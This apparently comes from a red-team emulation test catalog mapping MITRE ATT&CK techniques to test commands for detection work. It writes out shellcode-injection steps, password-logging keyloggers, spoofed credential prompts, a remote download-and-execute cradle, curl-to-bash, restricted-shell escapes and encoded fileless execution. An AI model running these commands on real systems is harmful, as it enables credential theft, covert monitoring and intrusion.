Prereq: Utility to inject must exist on disk at specified location (T1055\bin\x64\vuln_dll\msys-2.0.dll)
if (Test-Path "T1055\bin\x64\vuln_dll\msys-2.0.dll") {exit 0} else {exit 1}
Process Injection with Go using UuidFromStringA WinAPI
$T1055\bin\x64\UuidFromStringA.exe -debug
Description: Uses WinAPI UuidFromStringA to load shellcode to a memory address then executes the shellcode using EnumSystemLocalesA.
With this technique, memory is allocated on the heap and does not use commonly suspicious APIs such as VirtualAlloc, WriteProcessMemory, or CreateThread
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)
- References:
- https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
- https://twitter.com/_CPResearch_/status/1352310521752662018
- https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala
Process Injection with Go using EtwpCreateEtwThread WinAPI
$T1055\bin\x64\EtwpCreateEtwThread.exe -debug
Description: Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode within the application's process.
This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
Steps taken with this technique
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Call EtwpCreateEtwThread on shellcode address
5. Call WaitForSingleObject so the program does not end before the shellcode is executed
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)
- References:
- https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3
- https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm
Description: Executes shellcode in a remote process.
Steps taken with this technique
1. Get a handle to the target process
2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
4. Change the memory page permissions to Execute/Read with VirtualProtectEx
5. Execute the entrypoint of the shellcode in the remote process with RtlCreateUserThread
6. Close the handle to the remote process
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)
- References:
- https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike
Description: Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
Steps taken with this technique
1. Get a handle to the target process
2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
4. Change the memory page permissions to Execute/Read with VirtualProtectEx
5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
6. Close the handle to the remote process
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
- References:
- https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
Description: Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
1. Get a handle to the target process
2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
4. Change the memory page permissions to Execute/Read with VirtualProtectEx
5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
6. Close the handle to the remote process
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
Process Injection with Go using CreateThread WinAPI
$T1055\bin\x64\CreateThread.exe -debug
Description: This program executes shellcode in the current process using the following steps
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Call CreateThread on shellcode address
5. Call WaitForSingleObject so the program does not end before the shellcode is executed
This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
Process Injection with Go using CreateThread WinAPI (Natively)
$T1055\bin\x64\CreateThreadNative.exe -debug
Description: This program executes shellcode in the current process using the following steps
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Call CreateThread on shellcode address
5. Call WaitForSingleObject so the program does not end before the shellcode is executed
This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
Description: The UUIDs Process Injection code was first introduced by the NCC Group. The code can be stored in UUID forms on the heap and converted back to binary via UuidFromStringA at runtime. In this new custom version of UUID injection, EnumSystemLocalesA is the only API called to execute the code. We used custom UuidToString and UuidFromString implementations to avoid using UuidFromStringA and RPCRT4.dll, thereby eliminating the static signatures. This technique also avoided the use of VirtualAlloc, WriteProcessMemory and CreateThread
The injected shellcode will open a message box and a notepad.
Reference to NCC Group: https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
Concept from: http://ropgadget.com/posts/abusing_win_functions.html
Prereq: Portable Executable to inject must exist at specified location (T1055\bin\x64\uuid_injection.exe)
if (Test-Path "T1055\bin\x64\uuid_injection.exe") {exit 0} else {exit 1}
Description: Utilize PowerShell and external resource to capture keystrokes
[Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1)
Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log.
Prereq: Get-Keystrokes PowerShell script must exist on disk at PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1
if (Test-Path "T1056.001\src\Get-Keystrokes.ps1") {exit 0} else {exit 1}
Cleanup:
Remove-Item $env:TEMP\key.log -ErrorAction Ignore
T1056.001 - Input Capture: Keylogging
Living off the land Terminal Input Capture on Linux with pam.d
if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi; if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi; sudo touch /tmp/password-auth.bk sudo touch /tmp/system-auth.bk sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/password-auth sudo echo "session required pam_tty_audit.so enable=* log_password" >> /etc/pam.d/system-auth
Description: Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges.
Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command).
Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library.
Prereq: Checking if pam_tty_audit.so is installed
test -f '/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'
PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")' echo "\$PROMPT_COMMAND=$PROMPT_COMMAND" tail /var/log/syslog
Description: There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.
To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
Prereq: This test requires to be run in a bash shell and that logger and tee are installed.
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
Description: There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.
To gain persistence the command could be added to the users .shrc or .profile
Prereq: This test requires to be run in a bash shell and that logger and tee are installed.
if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
Description: When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger.
To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
Prereq: This test requires to be run in a bash shell
if [ "$(echo $0)" != "bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
Description: Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.
Prereq: This test requires sshd and auditd
if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
Cleanup:
cp -fv /tmp/sshd /etc/pam.d/
T1056.001 - Input Capture: Keylogging
Auditd keylogger
auditctl -a always,exit -F arch=b64 -S execve -k CMDS auditctl -a always,exit -F arch=b32 -S execve -k CMDS whoami; ausearch -i --start now
Description: The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log.
Prereq: This test requires sshd and auditd
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
Cleanup:
systemctl restart auditd
T1056.001 - Input Capture: Keylogging
MacOS Swift Keylogger
swift T1056.001/src/MacOSKeylogger.swift -keylog
Description: Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required.
Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring.
Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
Prereq: swift script must exist at T1056.001/src/MacOSKeylogger.swift, and the terminal must have input monitoring permissions.
if [ -f T1056.001/src/MacOSKeylogger.swift ]; then chmod +x T1056.001/src/MacOSKeylogger.swift; else exit 1; fi
Cleanup:
kill `pgrep swift-frontend`
T1056.002 - Input Capture: GUI Input Capture
AppleScript - Prompt User for Password
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
Description: Prompt User for Password (Local Phishing)
Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
T1056.002 - Input Capture: GUI Input Capture
PowerShell - Prompt User for Password
# Creates GUI to prompt for password. Expect long pause before prompt is available. $cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName) # Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework. write-warning $cred.GetNetworkCredential().Password
Description: Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.
Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
T1056.002 - Input Capture: GUI Input Capture
AppleScript - Spoofing a credential prompt using osascript
PWD_SPOOF=$(osascript -e 'display dialog "To perform a security update MacOS needs your passphrase." with title "MacOS Security Update" default answer "" with icon stop with hidden answer') echo $PWD_SPOOF
Description: Prompt user for password without requiring permissions to send Apple events to System Settings.
https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
Description: Hooks functions in PowerShell to read TLS Communications
Prereq: T1056.004x64.dll must exist on disk at specified location (T1056.004\bin\T1056.004x64.dll)
if (Test-Path "T1056.004\bin\T1056.004x64.dll") {exit 0} else {exit 1}
T1057 - Process Discovery
Process Discovery - ps
ps >> /tmp/loot.txt ps aux >> /tmp/loot.txt
Description: Utilize ps to identify processes.
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
Cleanup:
rm /tmp/loot.txt
T1057 - Process Discovery
Process Discovery - tasklist
tasklist
Description: Utilize tasklist to identify processes.
Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout.
T1057 - Process Discovery
Process Discovery - Get-Process
Get-Process
Description: Utilize Get-Process PowerShell cmdlet to identify processes.
Upon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout.
T1057 - Process Discovery
Process Discovery - get-wmiObject
get-wmiObject -class Win32_Process
Description: Utilize get-wmiObject PowerShell cmdlet to identify processes.
Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout.
T1057 - Process Discovery
Process Discovery - wmic process
wmic process get /format:list
Description: Utilize windows management instrumentation to identify processes.
Upon successful execution, WMIC will execute process to list processes. Output will be via stdout.
T1057 - Process Discovery
Discover Specific Process - tasklist
tasklist | findstr lsass
Description: Adversaries may use command line tools to discover specific processes in preparation of further attacks.
Examples of this could be discovering the PID of lsass.exe to dump its memory or discovering whether specific security processes (e.g. AV or EDR) are running.
Description: Process Hacker can be exploited to infiltrate system processes, identify weak points, or achieve unauthorized control over systems. However, its malicious use can often be flagged by security defenses, rendering it a perilous tool for illegitimate purposes.
Prereq: Process Hacker must be installed in the location
Description: PC Hunter is a toolkit with access to hundreds of settings including kernels, kernel modules, processes, network, startup, and more. When abused, this tool can allow threat actors to effectively access sensitive processes, collect system information, and terminate security software.
Description: An adverary may launch taskmgr.exe with the /7 switch via command prompt to view processes running on the system.
[Reference](https://github.com/trellix-enterprise/ac3-threat-sightings/blob/main/sightings/Sightings_Conti_Ransomware.yml)
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
Prereq: SharpHound.ps1 must be located at "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
if (Test-Path "..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1}
Cleanup:
Remove-Item $env:Temp\*BloodHound.zip -Force
T1059.001 - Command and Scripting Interpreter: PowerShell
Run Bloodhound from Memory using Download Cradle
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1'); Invoke-BloodHound -OutputDirectory $env:Temp Start-Sleep 5
Description: Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
Cleanup:
Remove-Item $env:Temp\*BloodHound.zip -Force
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Note: Windows 10 only. Upon execution windows backup and restore window will be opened.
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
Provided by https://github.com/mgreen27/mgreen27.github.io
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
Provided by https://github.com/mgreen27/mgreen27.github.io
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
Provided by https://github.com/mgreen27/mgreen27.github.io
T1059.001 - Command and Scripting Interpreter: PowerShell
Powershell Invoke-DownloadCradle
{MISSING IN ATOMIC RED TEAM}
Description: Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
T1059.001 - Command and Scripting Interpreter: PowerShell
PowerShell Fileless Script Execution
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team"" reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
Description: Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
art-marker.txt is in the folder.
Description: Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
Description: Connect to a remote powershell session and interact with the host.
Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
Description: Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Check for privilege escalation paths using PowerUp from PowerShellMafia
T1059.001 - Command and Scripting Interpreter: PowerShell
Abuse Nslookup with DNS Records
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami" # this would not be part of a real attack but helpful for this simulation function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")} powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Description: Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.
[reference](https://twitter.com/jstrosch/status/1237382986557001729)
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory.
src: https://github.com/FalconForceTeam/SOAPHound
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename.
src: https://github.com/FalconForceTeam/SOAPHound
T1059.002 - Command and Scripting Interpreter: AppleScript
Description: Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit.
You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request.
Reference: https://github.com/EmpireProject/Empire
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
Writes text to a file and displays it.
echo "Hello from the Windows Command Prompt!" > "%TEMP%\test.bin" & type "%TEMP%\test.bin"
Description: Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk.
Cleanup:
del "%TEMP%\test.bin" >nul 2>&1
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
Suspicious Execution via Windows Command Shell
%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt
Description: Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
Simulate BlackByte Ransomware Print Bombing
cmd /c "for /l %x in (1,1,75) do start wordpad.exe /p ..\ExternalPayloads\T1059_003note.txt" | out-null
Description: This test attempts to open a file a specified number of times in Wordpad, then prints the contents.
It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed.
See https://redcanary.com/blog/blackbyte-ransomware/.
Prereq: File to print must exist on disk at specified location (..\ExternalPayloads\T1059_003note.txt)
if (test-path "..\ExternalPayloads\T1059_003note.txt"){exit 0} else {exit 1}
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
Command Prompt read contents from CMD file and execute
cmd /r cmd<"T1059.003\src\t1059.003_cmd.cmd"
Description: Simulate Raspberry Robin using the "standard-in" command prompt feature cmd `/R <` to read and execute a file via cmd.exe
See https://redcanary.com/blog/raspberry-robin/.
Prereq: CMD file must exist on disk at specified location (T1059.003\src\t1059.003_cmd.cmd)
if (Test-Path "T1059.003\src\t1059.003_cmd.cmd") {exit 0} else {exit 1}
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
Command prompt writing script to file then executes it
Description: Simulate DarkGate malware's second stage by writing a VBscript to disk directly from the command prompt then executing it.
The script will execute 'whoami' then exit.
Cleanup:
del "AtomicTest.vbs" >nul 2>&1
T1059.004 - Command and Scripting Interpreter: Bash
Create and Execute Bash Shell Script
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh" chmod +x /tmp/art.sh sh /tmp/art.sh
Description: Creates and executes a simple sh script.
Cleanup:
rm /tmp/art.sh
T1059.004 - Command and Scripting Interpreter: Bash
Description: Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Cleanup:
rm /tmp/art-fish.txt
T1059.004 - Command and Scripting Interpreter: Bash
Description: AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Prereq: AutoSUID must exist on disk at specified location (T1059.004/src/AutoSUID.sh)
if [ -f T1059.004/src/AutoSUID.sh ]; then exit 0; else exit 1; fi;
Cleanup:
rm -rf T1059.004/src/AutoSUID.sh
T1059.004 - Command and Scripting Interpreter: Bash
Description: LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Prereq: LinnEnum must exist on disk at specified location (T1059.004/src/LinEnum.sh)
if [ -f T1059.004/src/LinEnum.sh ]; then exit 0; else exit 1; fi;
Cleanup:
rm -rf T1059.004/src/LinEnum.sh
T1059.004 - Command and Scripting Interpreter: Bash
Description: An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed.
Cleanup:
rm $TMPFILE unset TMPFILE
T1059.004 - Command and Scripting Interpreter: Bash
What shell is running
echo $0 if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi if $(printenv SHELL >/dev/null); then printenv SHELL; fi
Description: An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
T1059.004 - Command and Scripting Interpreter: Bash
What shells are available
cat /etc/shells
Description: An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
T1059.004 - Command and Scripting Interpreter: Bash
Command line scripts
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
Description: An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
T1059.004 - Command and Scripting Interpreter: Bash
Description: An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
T1059.004 - Command and Scripting Interpreter: Bash
Change login shell
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art cat /etc/passwd |grep ^art chsh -s /bin/sh art cat /etc/passwd |grep ^art
Description: An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Prereq: chsh - change login shell, must be installed
if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit 1"; exit 1; fi
Cleanup:
[ "$(uname)" = 'FreeBSD' ] && rmuser -y art || userdel art
T1059.004 - Command and Scripting Interpreter: Bash
Environment variable scripts
export ART='echo "Atomic Red Team was here... T1059.004"' echo $ART |/bin/sh
Description: An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Cleanup:
unset ART
T1059.004 - Command and Scripting Interpreter: Bash
Detecting pipe-to-shell
cd /tmp curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh |bash ls -la /tmp/art.txt
Description: An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
Prereq: Check if curl is installed on the machine.
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
Cleanup:
rm /tmp/art.txt
T1059.004 - Command and Scripting Interpreter: Bash
Current kernel information enumeration
uname -srm
Description: An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
T1059.004 - Command and Scripting Interpreter: Bash
Shell Creation using awk command
awk 'BEGIN {system("/bin/sh &")}'
Description: In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command.
Reference - https://gtfobins.github.io/gtfobins/awk/#shell
T1059.004 - Command and Scripting Interpreter: Bash
Description: cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell.
Reference - https://gtfobins.github.io/gtfobins/cpan/
T1059.004 - Command and Scripting Interpreter: Bash
Shell Creation using busybox command
busybox sh &
Description: BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell.
Reference - https://gtfobins.github.io/gtfobins/busybox/
T1059.004 - Command and Scripting Interpreter: Bash
emacs spawning an interactive system shell
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
Description: emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Prereq: Check if emacs is installed on the machine.
if [ -x "$(command -v emacs)" ]; then echo "emacs is installed"; else echo "emacs is NOT installed"; exit 1; fi
T1059.005 - Command and Scripting Interpreter: Visual Basic
Visual Basic script execution to gather local computer information
Description: Visual Basic execution test, execute vbscript via PowerShell.
When successful, system information will be written to $env:TEMP\T1059.005.out.txt.
Prereq: Sample script must exist on disk at specified location (T1059.005\src\sys_info.vbs)
if (Test-Path "T1059.005\src\sys_info.vbs") {exit 0} else {exit 1}
Description: This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"
A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
You can validate this by opening WinWord -> File -> Account -> About Word
Prereq: The 64-bit version of Microsoft Office must be installed
Description: This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.
Description: Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
Prereq: Requires Python
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $?
Cleanup:
rm T1059.006.pyc T1059.006.py T1059.006-payload
T1059.006 - Command and Scripting Interpreter: Python
Python pty module and spawn function used to spawn sh or bash
which_python=$(which python || which python3 || which python3.9 || which python2) $which_python -c "import pty;pty.spawn('/bin/sh')" exit $which_python -c "import pty;pty.spawn('/bin/bash')" exit
Description: Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
Prereq: Verify if python is in the environment variable path and attempt to import requests library.
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $?
T1059.007 - Command and Scripting Interpreter: JavaScript
JScript execution to gather local computer information via cscript
Description: JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt
Prereq: Sample script must exist on disk at specified location (T1059.007\src\sys_info.js)
if (Test-Path "T1059.007\src\sys_info.js") {exit 0} else {exit 1}
Cleanup:
del %tmp%\T1059.007.out.txt >nul 2>&1
T1059.007 - Command and Scripting Interpreter: JavaScript
JScript execution to gather local computer information via wscript
wscript "T1059.007\src\sys_info.js"
Description: JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes.
Prereq: Sample script must exist on disk at specified location (T1059.007\src\sys_info.js)
if (Test-Path "T1059.007\src\sys_info.js") {exit 0} else {exit 1}
T1059.010 - Command and Scripting Interpreter: AutoHotKey & AutoIT
